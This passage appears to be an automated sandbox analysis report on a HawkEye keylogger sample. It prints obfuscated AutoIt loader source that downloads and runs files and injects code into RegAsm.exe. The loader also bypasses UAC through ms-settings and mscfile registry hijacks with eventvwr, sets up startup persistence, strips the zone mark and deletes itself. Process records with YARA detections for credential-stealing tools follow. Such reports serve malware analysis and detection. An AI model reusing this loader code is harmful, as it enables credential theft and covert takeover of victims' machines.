$RESNAME , "long" , $RESTYPE ) ["0" ] CASE (1046 - + 4294966352 + 2576 + + 4294963375 + 4294964959 = 12455 7089 + 4798 - + 4294964189 + 4294964757 = + 4294965496 + 4294959781 + 5715 = + 4294965604 ) INETGET ($URL , $MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) CASE (1046 - + 4294966352 + 2576 + + 4294963375 + 4294964959 = 12455 7089 + 4798 - + 4294964189 + 4294964757 = + 4294965496 + 4294959781 + 5715 = + 4294965604 ) INETGET ($URL , $MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) ENDSWITCH SHELLEXECUTE ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) ENDIF ENDFUNC FUNC USZSAMCSMTSYZPPJDEGTV () IF @SCRIPTDIR <> $QCTGPDCYIKISRF THEN SHELLEXECUTE (@COMSPEC , "/k ping 127.0.0.1 -t 0 & del " & @AUTOITEXE & " & exit " , NULL , NULL , @SW_HIDE ) ENDIF ENDFUNC FUNC HEDXSPJMYHOVXLWDCYOBPIE ($KUFYPJEHBVLRVMKLNHZCLBTKUPASCOSYAPJAGFKQNAME , $FILENAME , $RUN , $RUNONCE , $DIR ) $OUBJOAAIMSDPJLUJMOJFFYTES = VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ($KUFYPJEHBVLRVMKLNHZCLBTKUPASCOSYAPJAGFKQNAME , "10" ) SWITCH 0 CASE (+ 4294967239 - + 4294963976 = 3263 7492 + + 4294961195 + 4294961363 + 5923 + + 4294959617 = + 4294960998 + 4294966597 - + 4294960065 + 4294962525 - + 4294961759 = 7298 ) FILESETATTRIB ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV2 [$I ] , $ATTRIB ) CASE (2187 + 1076 + 5480 = 8743 4917 + + 4294961081 + 4992 = 3694 6730 + + 4294965085 + 4294966507 + 1432 = 5162 ) LOCAL $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS = DLLCALL ("kernel32" , "ptr" , "VirtualAlloc" , "dword" , "0" , "dword" , $OUBJOAAIMSDPJLUJMOJFFINL , "dword" , "0x3000" , "dword" , "0x40" ) ["0" ] CASE (8846 - + 4294962944 - + 4294962679 + 4294965792 = 8886 4093 + 4294963430 + 8659 = 2389 + 4294963014 + 6671 = 16311 ) $FILE = DLLSTRUCTGETDATA ($OUBJOAAIMSDPJLUJMOJFFYTES , 1 ) CASE (+ 4294964059 + + 4294962924 + + 4294967138 - + 4294963385 = + 4294963440 + 4294958474 + + 4294963442 + + 4294960807 - + 4294960557 - + 4294958531 = + 4294963635 + 4294961634 + + 4294965767 + 4294965096 + 4294961286 + 4291 
= + 4294956186 ) LOCAL $DOGKUTDXAMPYZJRYYTZNFZHEXRHZJMBVTBU = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) CASE (8846 - + 4294962944 - + 4294962679 + 4294965792 = 8886 4093 + 4294963430 + 8659 = 2389 + 4294963014 + 6671 = 16311 ) $FILE = DLLSTRUCTGETDATA ($OUBJOAAIMSDPJLUJMOJFFYTES , 1 ) CASE (8846 - + 4294962944 - + 4294962679 + 4294965792 = 8886 4093 + 4294963430 + 8659 = 2389 + 4294963014 + 6671 = 16311 ) $FILE = DLLSTRUCTGETDATA ($OUBJOAAIMSDPJLUJMOJFFYTES , 1 ) ENDSWITCH LOCAL $MEMCMRFDKFHXIASCNLFGGABYOTQMAZ = GETDIR ($DIR ) & "\" & $FILENAME SWITCH 0 CASE (+ 4294966619 + + 4294963176 = + 4294962499 + 4294965711 - + 4294961778 + 4294961425 = + 4294965358 + 4294962989 + + 4294964067 + 4294963675 + + 4294966201 = + 4294955044 ) SHELLEXECUTE ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) CASE (8312 + 1982 + + 4294962964 + + 4294959945 = + 4294965907 3710 + 4294963974 + 4294966283 + 8277 - + 4294962055 = 12893 6311 + + 4294966087 + 596 = 5698 ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) CASE (5760 + + 4294958626 + 4294966279 + 4294963960 = 4439 + 4294964550 + 1282 + 7776 + + 4294965423 = + 4294956867 + 4294964669 + + 4294962298 + + 4294965903 + 3076 + + 4294962809 = + 4294960033 ) LOCAL $AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ = FILEOPEN ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ , "2" ) CASE (7185 + + 4294961171 + + 4294965364 - + 4294966204 + 4294960669 = + 4294960889 + 4294960604 + 4294962356 + 8860 = + 4294964524 + 4294965140 - + 4294963510 = 1630 ) LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (5760 + + 4294958626 + 4294966279 + 4294963960 = 4439 + 4294964550 + 1282 + 7776 + + 4294965423 = + 4294956867 + 4294964669 + + 4294962298 + + 4294965903 + 3076 + + 4294962809 = + 4294960033 ) LOCAL 
$AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ = FILEOPEN ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ , "2" ) CASE (5760 + + 4294958626 + 4294966279 + 4294963960 = 4439 + 4294964550 + 1282 + 7776 + + 4294965423 = + 4294956867 + 4294964669 + + 4294962298 + + 4294965903 + 3076 + + 4294962809 = + 4294960033 ) LOCAL $AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ = FILEOPEN ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ , "2" ) ENDSWITCH FILEWRITE ($AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ , $FILE ) FILECLOSE ($AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ ) IF NOT $RUNONCE THEN IF $RUN THEN SHELLEXECUTE ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ ) ENDIF ELSE IF @SCRIPTDIR <> $QCTGPDCYIKISRF THEN SHELLEXECUTE ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ ) ENDIF ENDIF ENDFUNC FUNC VMEUSMQQSSASICXZMBSLGU ($FILE , $REGKEY , $ATTRIB , $HIDDEN , $TGSFDS = "caca" ) SWITCH 1 CASE (8549 + 4294967162 = + 4294960174 + 4294962579 + + 4294964891 = + 4294950631 + 4294958887 + + 4294963929 + + 4294960194 + 2213 = 8415 ) PROCESSCLOSE (@AUTOITPID ) CASE (+ 4294964735 + 1132 + 2144 + + 4294967079 + 4294963292 = + 4294955842 656 + 4294964955 + + 4294965012 + + 4294963622 + 4294963485 = 113 + 4294964159 + 4294961883 - + 4294958633 = + 4294963790 ) LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (3063 - + 4294965455 + + 4294962885 + 4294962450 = + 4294962943 8788 + 8872 = 17660 8640 - + 4294962594 + 4294965715 + 4294959266 - + 4294963973 = 7054 ) DIRCREATE ($QCTGPDCYIKISRF ) CASE (45 + 2404 + 4294960043 - + 4294966245 + + 4294967082 = 91 + 4294965573 + 1814 = + 4294960772 + 4294962347 - + 4294962917 + 1142 + 1315 + + 4294958885 = + 4294963329 ) $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($QHNKYCOISAZTOELZARDAOCMMASRG , 
EXECUTE ("1" ) ) , "ptr" , "0" ) CASE (3063 - + 4294965455 + + 4294962885 + 4294962450 = + 4294962943 8788 + 8872 = 17660 8640 - + 4294962594 + 4294965715 + 4294959266 - + 4294963973 = 7054 ) DIRCREATE ($QCTGPDCYIKISRF ) CASE (3063 - + 4294965455 + + 4294962885 + 4294962450 = + 4294962943 8788 + 8872 = 17660 8640 - + 4294962594 + 4294965715 + 4294959266 - + 4294963973 = 7054 ) DIRCREATE ($QCTGPDCYIKISRF ) ENDSWITCH LOCAL $IPPNSZXFWUTJXQAWVFTS = $HIDDEN LOCAL $ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL = $QCTGPDCYIKISRF & "\" & $FILE LOCAL $DTISJMIDXWOJTBLFFZUKGGPNPUZNQYLQRCWBFFZMVROZJBWUDU = $QCTGPDCYIKISRF & "\" & $REGKEY & ".vbs" LOCAL $OBBNXDUCPNVNYLY = @STARTUPDIR & "\" & $REGKEY & ".url" SWITCH 0 CASE (+ 4294958727 - + 4294963247 - + 4294958543 + 4294960323 + + 4294959444 = + 4294956704 + 4294966055 + 7288 = 6047 2343 + + 4294960521 - + 4294966093 - + 4294964843 + 4294964418 = + 4294963642 ) PROCESSCLOSE (@AUTOITPID ) CASE (1443 - + 4294964141 + + 4294965835 = 3137 + 4294963925 + + 4294959942 + + 4294958774 + + 4294964567 = + 4294945320 + 4294959827 + 5690 - + 4294958835 + 4294960091 + 5971 = 5448 ) DLLSTRUCTSETDATA ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ , "lpfile" , $LPFILE ) CASE (2521 - + 4294962748 = 5827 97 + + 4294964695 + 8331 = 12011 3082 + 3903 + 4294963899 + 8423 = 7069 ) LOCAL $REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN = FILEOPEN (@AUTOITEXE , "16" ) CASE (1499 + 1756 = 3255 + 4294958631 + + 4294966665 = + 4294958000 6738 + 4294961273 + + 4294965801 - + 4294961381 = 5135 ) $MAINSTRUCPOINTER = DLLSTRUCTGETPTR ($DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC ) CASE (2521 - + 4294962748 = 5827 97 + + 4294964695 + 8331 = 12011 3082 + 3903 + 4294963899 + 8423 = 7069 ) LOCAL $REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN = FILEOPEN (@AUTOITEXE , "16" ) CASE (2521 - + 4294962748 = 5827 97 + + 4294964695 + 8331 = 12011 3082 + 3903 + 4294963899 + 8423 = 7069 ) LOCAL $REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN = FILEOPEN (@AUTOITEXE , "16" ) ENDSWITCH SWITCH 
1 CASE (+ 4294958989 + 6936 + + 4294960576 + + 4294959019 + + 4294965344 = + 4294964617 + 4294966288 + 4294965625 = + 4294966409 2027 + + 4294964382 = + 4294948976 ) $MEMORYPOINTER = DLLCALL ("kernel32.dll" , "ptr" , "LockResource" , "ptr" , $GLOBALMEMORYBLOCK ) ["0" ] CASE (1998 - + 4294962226 + 4294966763 = + 4294967017 + 4294965694 - + 4294962521 - + 4294964638 + + 4294961186 = + 4294961347 + 4294960714 + 633 = 6535 ) LOCAL $DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC = DLLSTRUCTCREATE ("dword;int;dword;STRUCT;ptr;int;int;int;ptr;ENDSTRUCT" ) CASE (3053 + + 4294966995 = 2752 + 4294966070 + 6344 + + 4294958753 + 4294960114 + 7152 = + 4294963841 8036 + + 4294966060 + 4683 = 11483 ) LOCAL $PRHKQAPJBDGMOYQHNKCCTDTPRCYIUEPSJUNSSPNOYBI = FILEOPEN ($ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL , "2" ) CASE (7182 - + 4294962091 + 4294967084 - + 4294962089 = 19435 7979 - + 4294962243 - + 4294964733 + 3840 = 21022 4013 - + 4294962213 - + 4294960126 - + 4294962540 = 17382 ) REGWRITE ("HKCU\Software\Classes\mscfile\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) CASE (3053 + + 4294966995 = 2752 + 4294966070 + 6344 + + 4294958753 + 4294960114 + 7152 = + 4294963841 8036 + + 4294966060 + 4683 = 11483 ) LOCAL $PRHKQAPJBDGMOYQHNKCCTDTPRCYIUEPSJUNSSPNOYBI = FILEOPEN ($ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL , "2" ) CASE (3053 + + 4294966995 = 2752 + 4294966070 + 6344 + + 4294958753 + 4294960114 + 7152 = + 4294963841 8036 + + 4294966060 + 4683 = 11483 ) LOCAL $PRHKQAPJBDGMOYQHNKCCTDTPRCYIUEPSJUNSSPNOYBI = FILEOPEN ($ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL , "2" ) ENDSWITCH LOCAL $OUBJOAAIMSDPJLUJMOJFFINARY = FILEREAD ($REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN ) & BINARY (RANDOM ("0" , "255" ) ) LOCAL $URLCONTENT = "[InternetShortcut]" & @CR & "URL=file:///" & $ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL LOCAL $URLOPEN LOCAL $VBSOPEN SWITCH 1 CASE (+ 4294961555 + 2247 - + 4294966288 + + 4294967118 = 1052 + 4294960077 - + 4294959025 = + 4294965077 
6493 + 4294960978 + + 4294964902 = + 4294964632 ) SHELLEXECUTE ("eventvwr" ) CASE (+ 4294963414 + 8752 + + 4294965939 + 4294963613 + 6695 = 15951 + 4294960241 + 4390 - + 4294958576 + 3437 - + 4294960837 = + 4294963075 + 4294962461 + 4294964607 + 6744 + + 4294963855 = 6525 ) DLLCALL ("kernel32" , "dword" , "VirtualFree" , "dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS , "dword" , "0" , "dword" , "0x8000" ) CASE (7171 + 4294960425 + 4294964215 = + 4294964515 7291 - + 4294961161 = 13426 6563 - + 4294963960 + 4294965134 + 4294959965 = 406 ) $URLOPEN = FILEOPEN ($OBBNXDUCPNVNYLY , "2" ) CASE (1858 + 4294964327 - + 4294964953 + + 4294963183 + + 4294963485 = 4806 + 4294963952 - + 4294962366 - + 4294959443 + + 4294962663 = + 4294957730 + 4294960691 + + 4294962753 - + 4294959835 - + 4294967214 + + 4294961335 = + 4294960604 ) LOCAL $AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ = FILEOPEN ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ , "2" ) CASE (7171 + 4294960425 + 4294964215 = + 4294964515 7291 - + 4294961161 = 13426 6563 - + 4294963960 + 4294965134 + 4294959965 = 406 ) $URLOPEN = FILEOPEN ($OBBNXDUCPNVNYLY , "2" ) CASE (7171 + 4294960425 + 4294964215 = + 4294964515 7291 - + 4294961161 = 13426 6563 - + 4294963960 + 4294965134 + 4294959965 = 406 ) $URLOPEN = FILEOPEN ($OBBNXDUCPNVNYLY , "2" ) ENDSWITCH SWITCH 1 CASE (+ 4294964357 + + 4294959463 + + 4294959370 = 21017 7887 - + 4294962944 + 2211 + 6567 = + 4294953995 + 4294958490 + 4294964436 + 4294965661 = + 4294948598 ) REGWRITE ("HKCU\Software\Classes\mscfile\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) CASE (3419 - + 4294961531 - + 4294962604 = 13697 5522 - + 4294959121 = + 4294965727 1626 + 4804 + + 4294959049 + 248 = 13876 ) LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (1524 - + 4294963339 + + 4294958700 = + 4294964181 
5290 + 4294959862 + 4294961987 + + 4294959379 = + 4294951926 5604 + 4294962429 = 737 ) $VBSOPEN = FILEOPEN ($DTISJMIDXWOJTBLFFZUKGGPNPUZNQYLQRCWBFFZMVROZJBWUDU , "2" ) CASE (5372 - + 4294963556 = + 4294943043 + 4294958949 + + 4294964486 + + 4294960557 + + 4294960939 = 6351 3083 - + 4294966044 + 1800 + 216 = 9112 ) $RESSIZE = DLLCALL ("kernel32.dll" , "dword" , "SizeofResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] CASE (1524 - + 4294963339 + + 4294958700 = + 4294964181 5290 + 4294959862 + 4294961987 + + 4294959379 = + 4294951926 5604 + 4294962429 = 737 ) $VBSOPEN = FILEOPEN ($DTISJMIDXWOJTBLFFZUKGGPNPUZNQYLQRCWBFFZMVROZJBWUDU , "2" ) CASE (1524 - + 4294963339 + + 4294958700 = + 4294964181 5290 + 4294959862 + 4294961987 + + 4294959379 = + 4294951926 5604 + 4294962429 = 737 ) $VBSOPEN = FILEOPEN ($DTISJMIDXWOJTBLFFZUKGGPNPUZNQYLQRCWBFFZMVROZJBWUDU , "2" ) ENDSWITCH LOCAL $UAWZMRMLNVDLPAXAQO = EXECUTE ("Chr(34)&Chr(34)&Chr(34)" ) LOCAL $VBS = "Set WshShell = WScript.CreateObject(" & EXECUTE ("Chr(34)" ) & "WScript.Shell" & EXECUTE ("Chr(34)" ) & ") " & @CR & "WshShell.Run " & $UAWZMRMLNVDLPAXAQO & $ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL & $UAWZMRMLNVDLPAXAQO FILEWRITE ($VBSOPEN , $VBS ) FILEWRITE ($URLOPEN , $URLCONTENT ) FILEWRITE ($PRHKQAPJBDGMOYQHNKCCTDTPRCYIUEPSJUNSSPNOYBI , $OUBJOAAIMSDPJLUJMOJFFINARY ) LOCAL $FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV = [$URLOPEN , $VBSOPEN , $REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN , $PRHKQAPJBDGMOYQHNKCCTDTPRCYIUEPSJUNSSPNOYBI ] FOR $I = "0" TO UBOUND ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV ) - "1" FILECLOSE ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV [$I ] ) NEXT LOCAL $FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV2 = [$ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL , $QCTGPDCYIKISRF ] FOR $I = "0" TO UBOUND ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV2 ) - "1" FILESETATTRIB ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV2 [$I ] , $ATTRIB ) NEXT ENDFUNC FUNC GETDIR ($INDEX ) LOCAL $BKKJHJLDVEYSZMTHUBTEKIUJREJAMELPEDMWMRFSVOSPVMLDTVSFREOSQB 
= [@TEMPDIR , @APPDATADIR , @SCRIPTDIR ] RETURN $BKKJHJLDVEYSZMTHUBTEKIUJREJAMELPEDMWMRFSVOSPVMLDTVSFREOSQB [$INDEX - "1" ] ENDFUNC FUNC REMOVEZONEID () FILEDELETE (@AUTOITEXE & ":Zone.Identifier" ) ENDFUNC REMOVEZONEID () ZAAOVMXICJWJRRBGUADERMITN ("MdmDiagnosticsTool" ) LOCAL $IAHZOETNXYCDXIFHZTGAVGFJ = DLLSTRUCTGETDATA (VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ("SearchProtocolHost1" , "8" ) , EXECUTE ("1" ) ) $IAHZOETNXYCDXIFHZTGAVGFJ &= DLLSTRUCTGETDATA (VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ("browseui2" , "8" ) , EXECUTE ("1" ) ) $IAHZOETNXYCDXIFHZTGAVGFJ &= DLLSTRUCTGETDATA (VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ("DXCap3" , "8" ) , EXECUTE ("1" ) ) $IAHZOETNXYCDXIFHZTGAVGFJ &= DLLSTRUCTGETDATA (VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ("CompMgmtLauncher4" , "8" ) , EXECUTE ("1" ) ) $IAHZOETNXYCDXIFHZTGAVGFJ &= DLLSTRUCTGETDATA (VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ("upnpcont5" , "8" ) , EXECUTE ("1" ) ) $IAHZOETNXYCDXIFHZTGAVGFJ = QDAFJTRQZX ($IAHZOETNXYCDXIFHZTGAVGFJ , "pfbbylnnwxfmxxcjnorprwsicowdhtpxzmvsmsweotmvdzrhdh" ) $QCTGPDCYIKISRF = @APPDATADIR & "\winlogons" $RYQPPGEZBPAABSZNGQLSWMJIF = @HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" MKAWTJCTRCEZDEDBUQPZGMLXI ($RYQPPGEZBPAABSZNGQLSWMJIF , "" , $IAHZOETNXYCDXIFHZTGAVGFJ , FALSE ) VMEUSMQQSSASICXZMBSLGU ("winlogons.exe" , "winlogons" , "+R" , FALSE )
No network behavior found

Target ID:0
Start time:19:15:10
Start date:23/04/2022
Path:C:\Users\user\Desktop\slowday.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\slowday.exe"
Imagebase:0xdc0000
File size:2010624 bytes
MD5 hash:A172F4B0FA1A44CB60901944CFF7F8ED
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:low

Target ID:1
Start time:19:15:11
Start date:23/04/2022
Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Imagebase:0x7c0000
File size:53248 bytes
MD5 hash:529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000001.00000000.241802515.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000000.241802515.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000001.00000002.506906598.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.506906598.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.508932595.0000000003234000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.507298136.0000000003106000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.507684707.0000000003176000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.507061368.0000000003012000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:high

Target ID:2
Start time:19:15:15
Start date:23/04/2022
Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpF1A4.tmp
Imagebase:0x400000
File size:1171592 bytes
MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.250900010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.251237329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.260557591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.250194862.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.250547287.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:high

Target ID:6
Start time:19:15:22
Start date:23/04/2022
Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp33E2.tmp
Imagebase:0x400000
File size:1171592 bytes
MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000000.265133062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000000.265486423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
